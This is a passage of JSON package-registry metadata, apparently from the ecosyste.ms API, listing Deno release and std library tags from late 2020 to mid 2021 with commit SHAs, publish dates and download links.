d/deno/tar.gz/v1.10.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.2/manifests"},{"name":"v1.10.1","sha":"1cd1419e18386d512ab98849d132117182545b89","kind":"commit","published_at":"2021-05-12T03:11:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.1/manifests"},{"name":"v1.10.0","sha":"57927781ed7eb8bb088d656768dc295716407c7a","kind":"commit","published_at":"2021-05-12T00:06:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.0/manifests"},{"name":"v1.9.2","sha":"8074d8bcf3cdcc7e9a08df147e0082798a7c2760","kind":"commit","published_at":"2021-04-23T14:08:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.2/manifests"},{"name":"v1.9.1","sha":"7760d9a669552e69211b101d4656662a3dddf8dd","kind":"commit","published_at":"2021-04-20T23:46:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.1/manifests"},{"name":"v1.9.0","sha":"262ee78592209a1f8e449cfa1308dca9688a414e","kind":"commit","published_at":"2021-04-13T18:11:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.0/manifests"},{"name":"v1.8.3","sha":"2e6b78be9095cc38c392e2477711ff6eec226704","kind":"commit","published_at":"2021-04-02T10:10:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.3/manifests"},{"name":"v1.8.2","sha":"f50ed4e281e6c30120412271eb66a1fb67d1c63e","kind":"commit","published_at":"2021-03-21T20:12:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.2/manifests"},{"name":"v1.8.1","sha":"8d3baa7777b6bd2a2631e1b87a4676b520f2b447","kind":"commit","published_at":"2021-03-09T20:55:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.1/manifests"},{"name":"v1.8.0","sha":"18b894072d3eb6b04016e77ece0d78512f7ffca1","kind":"commit","published_at":"2021-03-02T23:23:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.0/manifests"},{"name":"v1.7.5","sha":"e9669bf0656c2478416f6705ff218539dc42c126","kind":"commit","published_at":"2021-02-19T14:58:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.5/manifests"},{"name":"v1.7.4","sha":"d2d7dc8d675d70f0061bdaf99ae4a08d84156aa9","kind":"commit","published_at":"2021-02-13T13:20:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.4/manifests"},{"name":"v1.7.3","sha":"f67b06939be5b754ecee306e9da1d7c0779c3cd6","kind":"commit","published_at":"2021-02-12T16:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.3/manifests"},{"name":"v1.7.2","sha":"647f11b3acc2f629a6d77836f5f6ef74ee10c4ce","kind":"commit","published_at":"2021-02-05T19:33:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.2/manifests"},{"name":"v1.7.1","sha":"11dd6f201378fe04cccadb46b7054cc2f791dda8","kind":"commit","published_at":"2021-01-29T14:53:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.1/manifests"},{"name":"std/0.85.0","sha":"11dd6f201378fe04cccadb46b7054cc2f791dda8","kind":"commit","published_at":"2021-01-29T14:53:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.85.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.85.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.85.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.85.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.85.0/manifests"},{"name":"v1.7.0","sha":"0f7a02500c0abdaae4ecfa89259c026c624773a9","kind":"commit","published_at":"2021-01-20T05:24:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.0/manifests"},{"name":"std/0.84.0","sha":"0f7a02500c0abdaae4ecfa89259c026c624773a9","kind":"commit","published_at":"2021-01-20T05:24:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.84.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.84.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.84.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.84.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.84.0/manifests"},{"name":"v1.6.3","sha":"b07a0b640d01d87c926a74d42e26a6561848c7c5","kind":"commit","published_at":"2020-12-30T15:13:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.3/manifests"},{"name":"std/0.83.0","sha":"b07a0b640d01d87c926a74d42e26a6561848c7c5","kind":"commit","published_at":"2020-12-30T15:13:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.83.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.83.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.83.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.83.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.83.0/manifests"},{"name":"v1.6.2","sha":"d199e45ad5dd180a6969abcd528023e173a1e1ff","kind":"commit","published_at":"2020-12-22T16:00:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.2/manifests"},{"name":"std/0.82.0","sha":"d199e45ad5dd180a6969abcd528023e173a1e1ff","kind":"commit","published_at":"2020-12-22T16:00:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.82.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.82.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.82.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.82.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.82.0/manifests"},{"name":"v1.6.1","sha":"b6d5ae1ecd125ce8a14cddc877cb66dbcfc9bb04","kind":"commit","published_at":"2020-12-14T20:25:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.1/manifests"},{"name":"std/0.81.0","sha":"b6d5ae1ecd125ce8a14cddc877cb66dbcfc9bb04","kind":"commit","published_at":"2020-12-14T20:25:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.81.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.81.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.81.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.81.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.81.0/manifests"},{"name":"v1.6.0","sha":"df87bf1d6a43ca36b520b45913839fd1f16df595","kind":"commit","published_at":"2020-12-08T14:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.0/manifests"},{"name":"std/0.80.0","sha":"df87bf1d6a43ca36b520b45913839fd1f16df595","kind":"commit","published_at":"2020-12-08T14:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.80.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.80.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.80.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.80.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.80.0/manifests"},{"name":"v1.5.4","sha":"bc79d556496420441977ca6f5c66be3dc3ded187","kind":"commit","published_at":"2020-11-23T14:10:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.4/manifests"},{"name":"std/0.79.0","sha":"bc79d556496420441977ca6f5c66be3dc3ded187","kind":"commit","published_at":"2020-11-23T14:10:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.79.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.79.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.79.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.79.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.79.0/manifests"},{"name":"v1.5.3","sha":"ab7b8ba8d15f37d6244784a16a3f4f3c96e38769","kind":"commit","published_at":"2020-11-16T10:14:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.3/manifests"},{"name":"std/0.78.0","sha":"ab7b8ba8d15f37d6244784a16a3f4f3c96e38769","kind":"commit","published_at":"2020-11-16T10:14:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.78.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.78.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.78.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.78.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.78.0/manifests"},{"name":"v1.5.2","sha":"71d7482577ee187187051ac8d9976a5387c038db","kind":"commit","published_at":"2020-11-08T23:58:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.2/manifests"},{"name":"std/0.77.0","sha":"71d7482577ee187187051ac8d9976a5387c038db","kind":"commit","published_at":"2020-11-08T23:58:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.77.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.77.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.77.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.77.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.77.0/manifests"},{"name":"v1.5.1","sha":"03769f11b5db314c550478852317d9ea108c2f76","kind":"commit","published_at":"2020-10-31T14:32:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.1/manifests"},{"name":"std/0.76.0","sha":"03769f11b5db314c550478852317d9ea108c2f76","kind":"commit","published_at":"2020-10-31T14:32:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.76.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.76.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.76.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.76.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.76.0/manifests"},{"name":"v1.5.0","sha":"dd01f206da0b7e1b305e70cdd3c98bf60fbefc5d","kind":"commit","published_at":"2020-10-27T15:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.0/manifests"},{"name":"std/0.75.0","sha":"dd01f206da0b7e1b305e70cdd3c98bf60fbefc5d","kind":"commit","published_at":"2020-10-27T15:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.75.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.75.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.75.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.75.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.75.0/manifests"},{"name":"v1.4.6","sha":"9e9ec9784a639ef7205e1e303301ee558439b045","kind":"commit","published_at":"2020-10-10T10:30:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.6/manifests"},{"name":"v1.4.5","sha":"b5e4b63a880ae41bd33dce5276c925ab7bd9519f","kind":"commit","published_at":"2020-10-08T12:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.5/manifests"},{"name":"std/0.74.0","sha":"b5e4b63a880ae41bd33dce5276c925ab7bd9519f","kind":"commit","published_at":"2020-10-08T12:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.74.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.74.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.74.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.74.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.74.0/manifests"},{"name":"v1.4.4","sha":"ae1ed2d16687413381fc7e6b55dca9b1676855f6","kind":"commit","published_at":"2020-10-03T12:58:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.4/manifests"},{"name":"std/0.73.0","sha":"ae1ed2d16687413381fc7e6b55dca9b1676855f6","kind":"commit","published_at":"2020-10-03T12:58:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.73.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.73.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.73.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.73.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.73.0/manifests"},{"name":"v1.4.3","sha":"63efa5f15dccf48d7a27f7d55344f1de63f786af","kind":"commit","published_at":"2020-10-02T12:37:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.3/manifests"},{"name":"std/0.72.0","sha":"63efa5f15dccf48d7a27f7d55344f1de63f786af","kind":"commit","published_at":"2020-10-02T12:37:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.72.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.72.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.72.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.72.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.72.0/manifests"},{"name":"v1.4.2","sha":"dacb340f8fe959ebf2949ff6e7480935556a9813","kind":"commit","published_at":"2020-09-25T14:53:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.2/manifests"},{"name":"std/0.71.0","sha":"dacb340f8fe959ebf2949ff6e7480935556a9813","kind":"commit","published_at":"2020-09-25T14:53:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.71.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.71.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.71.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.71.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.71.0/manifests"},{"name":"v1.4.1","sha":"d6f3de6feb006bf6911b938bfa43a3655c962c50","kind":"tag","published_at":"2020-09-18T19:40:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.1/manifests"},{"name":"std/0.70.0","sha":"d6f3de6feb006bf6911b938bfa43a3655c962c50","kind":"tag","published_at":"2020-09-18T19:38:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.70.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.70.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.70.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.70.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.70.0/manifests"},{"name":"v1.4.0","sha":"b3fa81f867f933df41f274bd8eec10dddf1b1b28","kind":"commit","published_at":"2020-09-13T14:35:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/G